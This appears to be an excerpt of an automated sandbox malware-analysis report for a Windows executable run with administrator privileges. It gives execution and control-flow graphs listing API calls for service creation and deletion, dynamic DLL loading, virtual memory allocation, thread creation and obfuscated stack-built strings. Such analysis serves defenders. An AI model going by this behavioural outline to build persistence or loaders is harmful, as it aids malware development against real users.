                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:32%
                                                    Total number of Nodes:462
                                                    Total number of Limit Nodes:7
                                                    execution_graph 16718 7ff8bfaf11b0 16728 7ff8bfaf1209 16718->16728 16719 7ff8bfaf1b90 51 API calls 16736 7ff8bfaf1300 BuildCatchObjectHelperInternal 16719->16736 16720 7ff8bfaf14f0 16751 7ff8bfaf1a40 16720->16751 16721 7ff8bfaf1b70 BuildCatchObjectHelperInternal 8 API calls 16725 7ff8bfaf14d3 16721->16725 16723 7ff8bfaf12c7 16727 7ff8bfaf1b90 51 API calls 16723->16727 16724 7ff8bfaf129e 16726 7ff8bfaf14f6 16724->16726 16737 7ff8bfaf1b90 16724->16737 16754 7ff8bfaf1110 16726->16754 16731 7ff8bfaf12b9 BuildCatchObjectHelperInternal 16727->16731 16728->16720 16728->16723 16728->16724 16728->16731 16728->16736 16731->16719 16734 7ff8bfaf14eb 16746 7ff8bfaf79cc 16734->16746 16736->16721 16740 7ff8bfaf1b9b 16737->16740 16738 7ff8bfaf12b0 16738->16731 16738->16734 16739 7ff8bfaf7a4c BuildCatchObjectHelperInternal 2 API calls 16739->16740 16740->16738 16740->16739 16741 7ff8bfaf1bba 16740->16741 16742 7ff8bfaf1bc5 16741->16742 16760 7ff8bfaf21f0 16741->16760 16743 7ff8bfaf1110 Concurrency::cancel_current_task 51 API calls 16742->16743 16745 7ff8bfaf1bcb 16743->16745 16747 7ff8bfaf7844 _invalid_parameter_noinfo 47 API calls 16746->16747 16748 7ff8bfaf79e5 16747->16748 16749 7ff8bfaf79fc _invalid_parameter_noinfo_noreturn 17 API calls 16748->16749 16750 7ff8bfaf79fa 16749->16750 16764 7ff8bfaf1b34 16751->16764 16755 7ff8bfaf111e Concurrency::cancel_current_task 16754->16755 16756 7ff8bfaf3990 Concurrency::cancel_current_task 2 API calls 16755->16756 16757 7ff8bfaf112f 16756->16757 16758 7ff8bfaf379c __std_exception_copy 49 API calls 16757->16758 16759 7ff8bfaf1159 16758->16759 16761 7ff8bfaf21fe Concurrency::cancel_current_task 16760->16761 16762 7ff8bfaf3990 Concurrency::cancel_current_task 2 API calls 16761->16762 16763 7ff8bfaf220f 16762->16763 16769 7ff8bfaf1ab0 16764->16769 16767 7ff8bfaf3990 Concurrency::cancel_current_task 2 API calls 16768 7ff8bfaf1b56 16767->16768 16770 7ff8bfaf379c __std_exception_copy 49 API calls 16769->16770 16771 7ff8bfaf1ae4 16770->16771 16771->16767 14030 140005df3 14031 140005e71 14030->14031 14032 140005e84 CreateFileA 14031->14032 14033 140005f50 _SetThrowImageBase 14032->14033 14034 140005fc3 malloc ReadFile 14033->14034 15208 140007412 15210 140007333 15208->15210 15209 140007403 15210->15209 15211 1400073e0 LdrLoadDll 15210->15211 15211->15210 15884 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15887 1400054e0 15884->15887 15886 1400136ef 15888 140005506 sprintf_s 15887->15888 15889 14000552c 15887->15889 15888->15886 15890 1400074d0 LdrLoadDll 15889->15890 15891 140005536 15890->15891 15892 140008370 3 API calls 15891->15892 15895 140005545 _SetThrowImageBase 15892->15895 15893 1400055b8 15894 140008de0 _lock 2 API calls 15893->15894 15896 1400055c0 sprintf_s 15894->15896 15895->15893 15897 1400074f0 LdrLoadDll 15895->15897 15896->15888 15898 140005561 CreateThread 15897->15898 15898->15896 15899 1400055b0 GetLastError 15898->15899 15899->15893 14039 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14040 140005ab1 14039->14040 14041 140005add GetVersionExA 14039->14041 14044 140005abf 14040->14044 14089 140009540 14040->14089 14042 140005b0e GetProcessHeap HeapFree 14041->14042 14043 140005af0 GetProcessHeap HeapFree 14041->14043 14049 140005b3c 14042->14049 14046 140005d0b 14043->14046 14097 140009300 14044->14097 14048 140005ac9 14108 140008510 GetModuleHandleA 14048->14108 14112 14000a310 HeapCreate 14049->14112 14052 140005ad3 14052->14046 14053 140005bec 14054 140005bf0 14053->14054 14056 140005c12 14053->14056 14055 140005bfe 14054->14055 14057 140009540 _lock 12 API calls 14054->14057 14058 140009300 _lock 10 API calls 14055->14058 14059 140005c17 14056->14059 14057->14055 14060 140005c08 14058->14060 14061 140005c3d 14059->14061 14063 140005c29 14059->14063 14064 140009540 _lock 12 API calls 14059->14064 14062 140008510 _lock 3 API calls 14060->14062 14115 140009f50 GetStartupInfoA 14061->14115 14062->14056 14065 140009300 _lock 10 API calls 14063->14065 14064->14063 14066 140005c33 14065->14066 14068 140008510 _lock 3 API calls 14066->14068 14068->14061 14070 140005c56 14135 140009e30 14070->14135 14073 140005c5b 14153 140009c30 14073->14153 14077 140005c73 14078 140005c81 14077->14078 14079 1400084e0 _lock 12 API calls 14077->14079 14183 140009690 14078->14183 14079->14078 14081 140005c86 14082 140005c94 14081->14082 14083 1400084e0 _lock 12 API calls 14081->14083 14195 140008650 14082->14195 14083->14082 14085 140005c9e 14086 1400084e0 _lock 12 API calls 14085->14086 14087 140005ca9 14085->14087 14086->14087 14199 140001520 14087->14199 14092 14000954e _lock 14089->14092 14090 14000961c 14090->14044 14091 14000959c 14093 140009300 _lock 10 API calls 14091->14093 14092->14090 14092->14091 14094 1400095c9 GetStdHandle 14092->14094 14093->14090 14094->14091 14095 1400095dc 14094->14095 14095->14091 14096 1400095e2 WriteFile 14095->14096 14096->14091 14100 140009320 _lock 14097->14100 14098 140009330 14098->14048 14099 1400094dc GetStdHandle 14099->14098 14101 1400094ef 14099->14101 14100->14098 14100->14099 14103 140009375 _lock 14100->14103 14101->14098 14102 1400094f5 WriteFile 14101->14102 14102->14098 14103->14098 14104 1400093b9 GetModuleFileNameA 14103->14104 14105 1400093d9 _lock 14104->14105 14217 14000f000 14105->14217 14109 140008543 ExitProcess 14108->14109 14110 14000852a GetProcAddress 14108->14110 14110->14109 14111 14000853f 14110->14111 14111->14109 14113 14000a334 14112->14113 14114 14000a339 HeapSetInformation 14112->14114 14113->14053 14114->14053 14243 140008370 14115->14243 14117 140005c48 14117->14070 14128 1400084e0 14117->14128 14118 14000a1c4 GetStdHandle 14127 14000a17c 14118->14127 14119 140008370 3 API calls 14124 140009f8a 14119->14124 14120 14000a239 SetHandleCount 14120->14117 14121 14000a1d8 GetFileType 14121->14127 14122 14000a0e3 14122->14117 14123 14000a11c GetFileType 14122->14123 14122->14127 14248 14000edc0 14122->14248 14123->14122 14124->14117 14124->14119 14124->14122 14124->14124 14124->14127 14126 14000edc0 _lock 3 API calls 14126->14127 14127->14117 14127->14118 14127->14120 14127->14121 14127->14126 14129 140009540 _lock 12 API calls 14128->14129 14130 1400084ed 14129->14130 14131 140009300 _lock 10 API calls 14130->14131 14132 1400084f4 14131->14132 14133 1400073e0 _lock LdrLoadDll 14132->14133 14134 140008500 14133->14134 14136 140009e7c 14135->14136 14137 140009e3e GetCommandLineW 14135->14137 14140 140009e81 GetCommandLineW 14136->14140 14141 140009e69 14136->14141 14138 140009e49 GetCommandLineW 14137->14138 14139 140009e5e GetLastError 14137->14139 14138->14139 14139->14141 14142 140009e75 14139->14142 14140->14141 14141->14142 14143 140009e91 GetCommandLineA MultiByteToWideChar 14141->14143 14142->14073 14144 140009ec8 14143->14144 14145 140009ed9 14143->14145 14144->14073 14146 140008370 3 API calls 14145->14146 14147 140009eeb 14146->14147 14148 140009f32 14147->14148 14149 140009ef3 MultiByteToWideChar 14147->14149 14148->14073 14150 140009f13 14149->14150 14151 140009f2a 14149->14151 14150->14073 14262 140008de0 14151->14262 14154 140009c52 GetEnvironmentStringsW 14153->14154 14155 140009c86 14153->14155 14156 140009c6c GetLastError 14154->14156 14162 140009c60 14154->14162 14157 140009c91 GetEnvironmentStringsW 14155->14157 14158 140009c77 14155->14158 14156->14155 14156->14158 14157->14162 14175 140005c67 14157->14175 14159 140009d09 GetEnvironmentStrings 14158->14159 14158->14175 14160 140009d17 14159->14160 14159->14175 14161 140009d58 14160->14161 14164 140009d20 MultiByteToWideChar 14160->14164 14165 140008370 3 API calls 14161->14165 14267 140008300 14162->14267 14164->14160 14164->14175 14167 140009d68 14165->14167 14170 140009d70 FreeEnvironmentStringsA 14167->14170 14172 140009d7d 14167->14172 14168 140009ce1 __CxxFrameHandler 14173 140009cef FreeEnvironmentStringsW 14168->14173 14169 140009cd1 FreeEnvironmentStringsW 14169->14175 14170->14175 14171 140009de5 FreeEnvironmentStringsA 14171->14175 14172->14171 14174 140009d90 MultiByteToWideChar 14172->14174 14173->14175 14174->14172 14176 140009e0e 14174->14176 14179 1400099c0 GetModuleFileNameW 14175->14179 14177 140008de0 _lock 2 API calls 14176->14177 14178 140009e16 FreeEnvironmentStringsA 14177->14178 14178->14175 14182 140009a03 14179->14182 14180 140008300 _lock 17 API calls 14181 140009bca 14180->14181 14181->14077 14182->14180 14182->14181 14184 1400096b2 14183->14184 14185 1400096a8 14183->14185 14186 140008370 3 API calls 14184->14186 14185->14081 14194 1400096fa 14186->14194 14187 140009709 14187->14081 14188 1400097a5 14189 140008de0 _lock 2 API calls 14188->14189 14190 1400097b4 14189->14190 14190->14081 14191 140008370 3 API calls 14191->14194 14192 1400097e5 14193 140008de0 _lock 2 API calls 14192->14193 14193->14190 14194->14187 14194->14188 14194->14191 14194->14192 14196 140008666 14195->14196 14198 1400086bf 14196->14198 14283 140005380 14196->14283 14198->14085 14200 140001565 14199->14200 14201 140001569 14200->14201 14202 14000157e 14200->14202 14321 140001430 GetModuleFileNameW OpenSCManagerW 14201->14321 14205 140001595 OpenSCManagerW 14202->14205 14206 14000164f 14202->14206 14209 1400015b2 GetLastError 14205->14209 14210 1400015cf OpenServiceW 14205->14210 14207 140001654 14206->14207 14208 140001669 StartServiceCtrlDispatcherW 14206->14208 14330 1400011f0 14207->14330 14208->14052 14209->14052 14212 140001611 DeleteService 14210->14212 14213 1400015e9 GetLastError CloseServiceHandle 14210->14213 14215 140001626 CloseServiceHandle CloseServiceHandle 14212->14215 14216 14000161e GetLastError 14212->14216 14213->14052 14215->14052 14216->14215 14218 14000f01e _lock 14217->14218 14219 14000f03b LoadLibraryA 14218->14219 14220 14000f125 _lock 14218->14220 14221 14000f054 GetProcAddress 14219->14221 14222 1400094c9 14219->14222 14235 14000f165 14220->14235 14240 1400073e0 LdrLoadDll 14220->14240 14221->14222 14223 14000f06d _lock 14221->14223 14222->14048 14227 14000f075 GetProcAddress 14223->14227 14225 1400073e0 _lock LdrLoadDll 14225->14222 14226 1400073e0 _lock LdrLoadDll 14232 14000f1e9 14226->14232 14229 140007220 _lock 14227->14229 14231 14000f094 GetProcAddress 14229->14231 14230 1400073e0 _lock LdrLoadDll 14230->14235 14234 14000f0b3 _lock 14231->14234 14233 1400073e0 _lock LdrLoadDll 14232->14233 14236 14000f1a3 _lock 14232->14236 14233->14236 14234->14220 14237 14000f0e9 GetProcAddress 14234->14237 14235->14226 14235->14236 14236->14225 14238 14000f101 _lock 14237->14238 14238->14220 14239 14000f10d GetProcAddress 14238->14239 14239->14220 14241 140007333 14240->14241 14241->14240 14242 140007403 14241->14242 14242->14230 14245 1400083a0 14243->14245 14246 1400083e0 14245->14246 14247 1400083be Sleep 14245->14247 14254 14000e850 14245->14254 14246->14124 14247->14245 14247->14246 14249 1400073e0 _lock LdrLoadDll 14248->14249 14250 14000edec _lock 14249->14250 14251 14000ee1d _lock 14250->14251 14252 14000ee26 GetModuleHandleA 14250->14252 14251->14122 14252->14251 14253 14000ee38 GetProcAddress 14252->14253 14253->14251 14255 14000e865 14254->14255 14256 14000e8be HeapAlloc 14255->14256 14258 14000e876 sprintf_s 14255->14258 14259 1400090b0 14255->14259 14256->14255 14256->14258 14258->14245 14260 1400073e0 _lock LdrLoadDll 14259->14260 14261 1400090c5 14260->14261 14261->14255 14263 140008de9 HeapFree 14262->14263 14266 140008e19 _lock 14262->14266 14264 140008dff sprintf_s 14263->14264 14263->14266 14265 140008e09 GetLastError 14264->14265 14265->14266 14266->14148 14268 140008320 14267->14268 14270 140008358 14268->14270 14271 140008338 Sleep 14268->14271 14272 1400090f0 14268->14272 14270->14168 14270->14169 14271->14268 14271->14270 14273 14000919e 14272->14273 14280 140009103 14272->14280 14274 1400090b0 _lock LdrLoadDll 14273->14274 14276 1400091a3 sprintf_s 14274->14276 14275 14000914c HeapAlloc 14275->14280 14281 140009173 sprintf_s 14275->14281 14276->14268 14277 140009540 _lock 12 API calls 14277->14280 14278 1400090b0 _lock LdrLoadDll 14278->14280 14279 140009300 _lock 10 API calls 14279->14280 14280->14275 14280->14277 14280->14278 14280->14279 14280->14281 14282 140008510 _lock 3 API calls 14280->14282 14281->14268 14282->14280 14286 140005250 14283->14286 14285 140005389 14285->14198 14287 140005271 14286->14287 14288 1400073e0 _lock LdrLoadDll 14287->14288 14289 14000527e 14288->14289 14290 1400073e0 _lock LdrLoadDll 14289->14290 14291 14000528d 14290->14291 14297 1400052f0 _lock 14291->14297 14298 140008490 14291->14298 14293 1400052b5 14294 1400052d9 14293->14294 14293->14297 14301 140008400 14293->14301 14296 140008400 7 API calls 14294->14296 14294->14297 14296->14297 14297->14285 14299 1400084c5 HeapSize 14298->14299 14300 140008499 sprintf_s 14298->14300 14300->14293 14303 140008430 14301->14303 14304 140008472 14303->14304 14305 140008450 Sleep 14303->14305 14306 14000e920 14303->14306 14304->14294 14305->14303 14305->14304 14307 14000e935 14306->14307 14308 14000e94c 14307->14308 14318 14000e95e 14307->14318 14309 140008de0 _lock 2 API calls 14308->14309 14312 14000e951 14309->14312 14310 14000e9b1 14311 1400090b0 _lock LdrLoadDll 14310->14311 14314 14000e9b9 _lock sprintf_s 14311->14314 14312->14303 14313 14000e973 HeapReAlloc 14313->14314 14313->14318 14314->14303 14315 14000e9f4 sprintf_s 14317 14000e9f9 GetLastError 14315->14317 14316 1400090b0 _lock LdrLoadDll 14316->14318 14317->14314 14318->14310 14318->14313 14318->14315 14318->14316 14319 14000e9db sprintf_s 14318->14319 14320 14000e9e0 GetLastError 14319->14320 14320->14314 14322 140001482 CreateServiceW 14321->14322 14323 14000147a GetLastError 14321->14323 14325 1400014ea GetLastError 14322->14325 14326 1400014df CloseServiceHandle 14322->14326 14324 1400014fd 14323->14324 14336 140004f30 14324->14336 14327 1400014f2 CloseServiceHandle 14325->14327 14326->14327 14327->14324 14329 14000150d 14329->14052 14331 1400011fa 14330->14331 14345 1400051d0 14331->14345 14334 140004f30 sprintf_s NtAllocateVirtualMemory 14335 140001262 14334->14335 14335->14052 14338 140004f39 _SetThrowImageBase 14336->14338 14337 140004f44 14337->14329 14338->14337 14341 140006c95 14338->14341 14340 14000660e sprintf_s 14340->14329 14343 140006d7b 14341->14343 14344 140006d9d 14341->14344 14342 140006f95 NtAllocateVirtualMemory 14342->14344 14343->14342 14343->14344 14344->14340 14348 140008270 14345->14348 14347 140001238 MessageBoxW 14347->14334 14349 14000827e 14348->14349 14350 1400082ac sprintf_s 14348->14350 14349->14350 14352 140008120 14349->14352 14350->14347 14353 14000813b sprintf_s 14352->14353 14354 14000816a 14352->14354 14353->14350 14354->14353 14357 1400081d7 14354->14357 14358 140007f50 14354->14358 14356 140007f50 sprintf_s 54 API calls 14356->14353 14357->14353 14357->14356 14365 140007f69 sprintf_s 14358->14365 14359 140007f74 sprintf_s 14359->14357 14360 14000801d 14361 1400080d5 14360->14361 14362 14000802f 14360->14362 14363 14000cc00 sprintf_s 54 API calls 14361->14363 14364 14000804c 14362->14364 14367 140008081 14362->14367 14368 140008056 14363->14368 14374 14000cc00 14364->14374 14365->14359 14365->14360 14371 14000cd50 14365->14371 14367->14368 14382 14000c2a0 14367->14382 14368->14357 14372 140008300 _lock 17 API calls 14371->14372 14373 14000cd6a 14372->14373 14373->14360 14375 14000cc3f 14374->14375 14381 14000cc23 sprintf_s 14374->14381 14375->14381 14390 14000fc50 14375->14390 14379 14000ccc5 sprintf_s 14435 14000fd20 LeaveCriticalSection 14379->14435 14381->14368 14383 14000c2c3 sprintf_s 14382->14383 14384 14000c2e0 14382->14384 14383->14368 14384->14383 14385 14000fc50 sprintf_s 25 API calls 14384->14385 14386 14000c34e 14385->14386 14387 14000c1f0 sprintf_s 2 API calls 14386->14387 14388 14000c367 sprintf_s 14386->14388 14387->14388 14469 14000fd20 LeaveCriticalSection 14388->14469 14391 14000fc96 14390->14391 14392 14000fccb 14390->14392 14436 14000b400 14391->14436 14393 14000ccac 14392->14393 14394 14000fccf EnterCriticalSection 14392->14394 14393->14379 14400 14000c3f0 14393->14400 14394->14393 14402 14000c42e 14400->14402 14419 14000c427 sprintf_s 14400->14419 14401 140004f30 sprintf_s NtAllocateVirtualMemory 14403 14000cbe6 14401->14403 14406 14000c4fb _SetThrowImageBase sprintf_s 14402->14406 14402->14419 14463 14000c1f0 14402->14463 14403->14379 14405 14000c841 14407 14000c86a 14405->14407 14408 14000cb20 WriteFile 14405->14408 14406->14405 14409 14000c526 GetConsoleMode 14406->14409 14411 14000c936 14407->14411 14415 14000c876 14407->14415 14410 14000cb53 GetLastError 14408->14410 14408->14419 14409->14405 14412 14000c557 14409->14412 14410->14419 14417 14000c940 14411->14417 14426 14000ca02 14411->14426 14412->14405 14413 14000c564 GetConsoleCP 14412->14413 14413->14419 14421 14000c581 sprintf_s 14413->14421 14414 14000c8c5 WriteFile 14414->14415 14416 14000c928 GetLastError 14414->14416 14415->14414 14415->14419 14416->14419 14417->14419 14420 14000c991 WriteFile 14417->14420 14418 14000ca57 WideCharToMultiByte 14422 14000cb15 GetLastError 14418->14422 14418->14426 14419->14401 14420->14417 14423 14000c9f4 GetLastError 14420->14423 14421->14419 14427 14000c649 WideCharToMultiByte 14421->14427 14429 14000c829 GetLastError 14421->14429 14431 14000fd50 7 API calls sprintf_s 14421->14431 14432 14000c6e2 WriteFile 14421->14432 14434 14000c81b GetLastError 14421->14434 14422->14419 14423->14419 14424 14000cab0 WriteFile 14425 14000caf6 GetLastError 14424->14425 14424->14426 14425->14419 14425->14426 14426->14418 14426->14419 14426->14424 14427->14419 14428 14000c68c WriteFile 14427->14428 14428->14421 14430 14000c80d GetLastError 14428->14430 14429->14419 14430->14419 14431->14421 14432->14421 14433 14000c7ff GetLastError 14432->14433 14433->14419 14434->14419 14437 14000b41e 14436->14437 14438 14000b42f EnterCriticalSection 14436->14438 14442 14000b2f0 14437->14442 14440 14000b423 14440->14438 14441 1400084e0 _lock 12 API calls 14440->14441 14441->14438 14443 14000b317 14442->14443 14444 14000b32e 14442->14444 14446 140009540 _lock 12 API calls 14443->14446 14445 14000b342 sprintf_s 14444->14445 14447 140008300 _lock 17 API calls 14444->14447 14445->14440 14448 14000b31c 14446->14448 14449 14000b350 14447->14449 14450 140009300 _lock 10 API calls 14448->14450 14449->14445 14453 14000b400 _lock 22 API calls 14449->14453 14451 14000b324 14450->14451 14452 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14451->14452 14452->14444 14454 14000b371 14453->14454 14455 14000b3a7 14454->14455 14456 14000b379 14454->14456 14457 140008de0 _lock HeapFree GetLastError 14455->14457 14458 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14456->14458 14462 14000b392 sprintf_s 14457->14462 14459 14000b386 14458->14459 14461 140008de0 _lock HeapFree GetLastError 14459->14461 14459->14462 14460 14000b3b0 LeaveCriticalSection 14460->14445 14461->14462 14462->14460 14464 14000c20c sprintf_s 14463->14464 14465 14000c212 sprintf_s 14464->14465 14466 14000c22c SetFilePointer 14464->14466 14465->14406 14467 14000c254 sprintf_s 14466->14467 14468 14000c24a GetLastError 14466->14468 14467->14406 14468->14467 14035 140006c95 14037 140006d7b 14035->14037 14038 140006d9d 14035->14038 14036 140006f95 NtAllocateVirtualMemory 14036->14038 14037->14036 14037->14038 14470 1400054e0 14471 140005506 sprintf_s 14470->14471 14472 14000552c 14470->14472 14483 1400074d0 14472->14483 14475 140008370 3 API calls 14478 140005545 _SetThrowImageBase 14475->14478 14476 1400055b8 14477 140008de0 _lock 2 API calls 14476->14477 14479 1400055c0 sprintf_s 14477->14479 14478->14476 14487 1400074f0 14478->14487 14479->14471 14482 1400055b0 GetLastError 14482->14476 14486 140007333 14483->14486 14484 1400073e0 LdrLoadDll 14484->14486 14485 140005536 14485->14475 14486->14484 14486->14485 14490 140007333 14487->14490 14488 140005561 CreateThread 14488->14479 14488->14482 14489 1400073e0 LdrLoadDll 14489->14490 14490->14488 14490->14489

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 153 140006f89-140006f8e 149->153 154 140006eef-140006f23 149->154 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                    • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->260 274->260 275->264
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                    • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: File$CreateReadmalloc
                                                    • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                    • API String ID: 3950102678-3381721293
                                                    • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                    • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 7ff8bfaf1c00-7ff8bfaf1c06 26 7ff8bfaf1c41-7ff8bfaf1c4b 25->26 27 7ff8bfaf1c08-7ff8bfaf1c0b 25->27 28 7ff8bfaf1d68-7ff8bfaf1d7d 26->28 29 7ff8bfaf1c35-7ff8bfaf1c74 call 7ff8bfaf2470 27->29 30 7ff8bfaf1c0d-7ff8bfaf1c10 27->30 33 7ff8bfaf1d7f 28->33 34 7ff8bfaf1d8c-7ff8bfaf1da6 call 7ff8bfaf2304 28->34 48 7ff8bfaf1d42 29->48 49 7ff8bfaf1c7a-7ff8bfaf1c8f call 7ff8bfaf2304 29->49 31 7ff8bfaf1c12-7ff8bfaf1c15 30->31 32 7ff8bfaf1c28 __scrt_dllmain_crt_thread_attach 30->32 36 7ff8bfaf1c17-7ff8bfaf1c20 31->36 37 7ff8bfaf1c21-7ff8bfaf1c26 call 7ff8bfaf23b4 31->37 40 7ff8bfaf1c2d-7ff8bfaf1c34 32->40 38 7ff8bfaf1d81-7ff8bfaf1d8b 33->38 46 7ff8bfaf1ddb-7ff8bfaf1e0c call 7ff8bfaf2630 34->46 47 7ff8bfaf1da8-7ff8bfaf1dd9 call 7ff8bfaf242c call 7ff8bfaf22d4 call 7ff8bfaf27b4 call 7ff8bfaf25d0 call 7ff8bfaf25f4 call 7ff8bfaf245c 34->47 37->40 57 7ff8bfaf1e0e-7ff8bfaf1e14 46->57 58 7ff8bfaf1e1d-7ff8bfaf1e23 46->58 47->38 52 7ff8bfaf1d44-7ff8bfaf1d59 48->52 60 7ff8bfaf1c95-7ff8bfaf1ca6 call 7ff8bfaf2374 49->60 61 7ff8bfaf1d5a-7ff8bfaf1d67 call 7ff8bfaf2630 49->61 57->58 63 7ff8bfaf1e16-7ff8bfaf1e18 57->63 64 7ff8bfaf1e65-7ff8bfaf1e6d call 7ff8bfaf1720 58->64 65 7ff8bfaf1e25-7ff8bfaf1e2f 58->65 75 7ff8bfaf1cf7-7ff8bfaf1d01 call 7ff8bfaf25d0 60->75 76 7ff8bfaf1ca8-7ff8bfaf1ccc call 7ff8bfaf2778 call 7ff8bfaf22c4 call 7ff8bfaf22e8 call 7ff8bfaf7b10 60->76 61->28 70 7ff8bfaf1f02-7ff8bfaf1f0f 63->70 77 7ff8bfaf1e72-7ff8bfaf1e7b 64->77 71 7ff8bfaf1e36-7ff8bfaf1e3c 65->71 72 7ff8bfaf1e31-7ff8bfaf1e34 65->72 78 7ff8bfaf1e3e-7ff8bfaf1e44 71->78 72->78 75->48 98 7ff8bfaf1d03-7ff8bfaf1d0f call 7ff8bfaf2620 